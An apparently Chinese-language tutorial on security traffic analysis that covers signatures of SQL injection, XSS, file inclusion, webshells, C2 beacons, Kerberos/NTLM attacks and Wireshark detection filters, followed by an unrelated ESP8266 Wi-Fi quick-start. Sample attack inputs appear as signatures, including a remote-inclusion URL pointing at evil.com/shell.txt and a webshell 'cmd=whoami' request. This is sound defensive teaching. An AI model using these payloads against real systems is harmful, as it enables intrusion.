流量分析基础知识一文速通

🔍 1. 引言:流量分析的重要性

在网络安全领域,流量分析是检测攻击、溯源黑客行为、取证分析的核心技术之一。无论是 Web 攻击、内网渗透,还是协议滥用,流量数据都是最直接、最可靠的证据。

在安全事件调查中,我们通常依赖 电子四大证据

  • 📜 日志(Logs):记录主机、网络设备、安全设备的操作历史,如 WAF、IDS/IPS 记录的攻击日志。
  • 🌐 流量(Traffic):抓取网络数据包,分析攻击者行为及 C2(命令控制)通信。
  • 🧠 内存(Memory):分析进程运行时的内容,可能包含密钥、后门、Shellcode。
  • 💽 磁盘(Disk):存储攻击者植入的 WebShell、恶意程序、凭据等关键数据。

🛠 2. 流量分析核心工具

工具功能适用场景
Wireshark图形化抓包分析工具详细分析流量,检测攻击行为
TsharkWireshark 命令行版本批量解析流量、自动化分析
Tcpdump轻量级抓包工具服务器端实时流量监测

📖 三大篇章:深入解析流量分析核心技术

分析方向重点内容
Web 安全流量分析Web 攻击(SQL 注入、XSS)、WebShell 特征分析与解密
内网安全流量分析常见 C2 流量(Meterpreter、Cobalt Strike)、横向移动、Kerberos 与 NTLM 协议
网络协议安全分析ARP 欺骗、MAC 欺骗、DHCP 伪造、DNS 隧道等流量攻击

📌 1. Web 安全流量分析

🔴 Web 攻击流量特征分析

常见 Web 攻击(SQLi、XSS、文件包含)具有明显的流量特征,如:

SQL 注入(SQLi)

GET /index.php?id=1 UNION SELECT 1,2,3--
  • 特征
    • 出现 UNION SELECTOR 1=1AND 1=1等 SQL 关键字
    • 非正常 HTTP 请求,通常伴随 500、403、200 等异常状态码
    • 访问日志中 SQL 语句异常暴露

XSS 攻击

GET /search?q=<script>alert(‘XSS’);</script>
  • 特征
    • scriptonerror<img src=x onerror=alert(1)> 等关键字
    • URL 中出现 %3Cscript%3E(URL 编码)
    • 受害者主机向攻击者 IP 发起 HTTP 请求

文件包含(LFI/RFI)

?page=../../../../../etc/passwd
  • 特征
    • URL 中 ../..//etc/passwd 关键字
    • .php?page=http://evil.com/shell.txt 远程文件包含(RFI)
    • HTTP 响应数据中泄露系统文件内容

🕵️‍♂️ WebShell 解析与解密

WebShell 主要通过 HTTP POST 进行交互,常见特征包括:

  • 特征 1:POST 请求包含可疑 Payload
    POST /uploads/shell.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    cmd=whoami
    
  • 特征 2:返回异常响应
    • 正常网站通常返回 200,但 WebShell 可能返回 空白页面(HTTP 204)500
  • 特征 3:WebShell 加密流量
    • 使用 Base64 编码,如 ZXZhbCgnbHMgLWFsJyk=(解码后为 eval('ls -al')

检测方式

  • 结合 Wireshark + YARA 规则 扫描 WebShell 关键字
  • 在 WAF 规则中 拦截异常 POST 访问

📌 2. 内网安全流量分析

🔴 常见 C2 攻击流量

C2 工具流量特征
MeterpreterHTTP/HTTPS 长连接,伪装正常流量
Cobalt Strike可定制 C2,流量可能模仿正常网站访问
Sliver / Havoc使用 WebSocket 或 DNS 隧道
Cobalt Strike 流量检测
  • 特征
    • 心跳包(Beaconing)间隔固定
    • 服务器返回伪造 404、503 状态码
  • Wireshark 过滤规则
    http.request && ip.src==192.168.1.100
    

🕵️‍♂️ 横向移动流量分析

🔹 Kerberos 攻击流量

  • 攻击方式
    • AS-REP Roasting:请求未加密的 TGT 票据
    • Pass-the-Ticket(PtT):窃取票据并伪造身份
  • 流量特征
    kerberos.CnameString=="Administrator"
    
    • 大量 AS-REQ 请求
    • 目标账号可能为高权限用户

🔹 NTLM Relay 攻击

  • 特征
    • NTLMSSP_AUTH 请求异常增多
    • SMB、LDAP 认证失败率升高
  • 检测
    smb && ntlmssp
    

📌 3. 网络协议安全分析

🔴 协议攻击与流量分析

协议攻击手法检测方式
ARPARP 欺骗(中间人攻击)arp.duplicate-address-detected
MACMAC 伪造(Mac Spoofing)eth.src == MAC地址
DHCPRogue DHCP 服务器bootp.option.dhcp == 2
DNSDNS 隧道、劫持dns.qry.name contains "example.com"

🕵️‍♂️ DNS 隧道检测

  • 特征
    • DNS 请求长度异常(如 Base64 编码)
    • 频繁向非标准 DNS 服务器请求
  • Wireshark 过滤规则
    dns && frame.len > 300
    

🎯 结语:流量分析是安全分析的核心技能

流量分析不仅是 安全事件响应(Incident Response) 的核心,更是发现攻击、溯源黑客的重要手段。掌握 工具、协议、攻击流量特征,能让你在攻防对抗中快人一步!

### ESP8266 快入门教程 #### 硬件准备 对于初学者来说,ESP8266 是一款非常适合学习和实验的微控制器。所需的主要硬件包括一台电脑以及一块支持 USB 接口供电并能直接过该接口进行程序烧录操作的 ESP8266 开发板,比如 NodeMCU 或 WiFiDuino 版本均较为推荐[^1]。 #### 软件安装与配置 为了能够顺利地向设备加载代码,在开始编写应用程序之前还需要准备好相应的工具链环境。具体而言就是获取适合目标平台运行的操作系统镜像文件——即固件,并借助专门设计用于刷写这类嵌入式系统的软件完成更新过程;例如 nodemcu-flasher 就是一个不错的选择[^2]。 #### 编程实践 一旦完成了上述准备工作之后便可以着手尝试简单的例子来熟悉整个流程了。这里给出一段 Python 风格的小片段作为示范: ```python import network sta_if = network.WLAN(network.STA_IF) if not sta_if.isconnected(): print('connecting to network...') sta_if.active(True) sta_if.connect('<your-ssid>', '<your-password>') while not sta_if.isconnected(): pass print('network config:', sta_if.ifconfig()) ``` 这段代码实现了连接 Wi-Fi 功能,其中 `<your-ssid>` 和 `<your-password>` 应替换为实际的家庭路由器设置参数。成功执行后将会打印出分配给当前节点 IP 地址等网络信息[^3]。 #### 进阶技巧 当掌握了基础知识以后还可以探索更多高级特性,如利用命令行工具自定义编译选项以适应不同应用场景下的需求。例如可以过指定 `ESPPORT` 参数覆盖默认串口号来进行闪存或监控操作,同样也能调整波特率从而优化传输效率[^4]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值